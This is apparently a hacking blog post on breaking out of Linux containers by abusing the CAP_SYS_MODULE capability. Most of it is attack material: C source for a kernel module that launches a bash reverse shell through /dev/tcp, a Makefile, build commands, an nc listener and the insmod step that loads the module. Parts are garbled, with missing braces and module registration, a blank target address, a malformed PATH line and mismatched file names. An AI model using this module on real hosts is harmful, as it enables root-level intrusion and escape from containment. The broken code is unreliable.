Breaking Out of Containers - Exploiting Sys_Module Capability


Linux Capabilities are used to allow binaries (executed by non-root users) to perform privileged operations without providing them all root permissions. There are currently 40 capabilities supported by the Linux kernel. 

in this article we are going to see the process to exploit Cap_Sys_Module capability and gain a root shell or an extended shell. 

#List all Capabilities on the Target Machine
#cap_sys_module is exploitable 

capsh --print
Create a Reverse Shell Payload

#save the below code as rev.c and send it to target machine

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_DESCRIPTION("LKM reverse shell module");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/ 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
Create Makefile
#Save the file as Makefile upload it to target machine

obj-m +=reverse-shell.o

     make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

     make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Compile the files 

export PATH=$PATH/usr/lib/gcc/x86_64-linux-gnu/10/
make clean
make all 
#validate the version and the file path make -C /lib/modules/4.15.0-142-generic/build M=/root clean make -C /lib/modules/4.15.0-142-generic/build M=/root modules #start the shell on attacker machine nc -nvlp 9001 #Insert the kernel module insmod reverse-shell.ko

Well, Thats how you Break Out of Containers by Exploiting Sys_Module Capability 

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment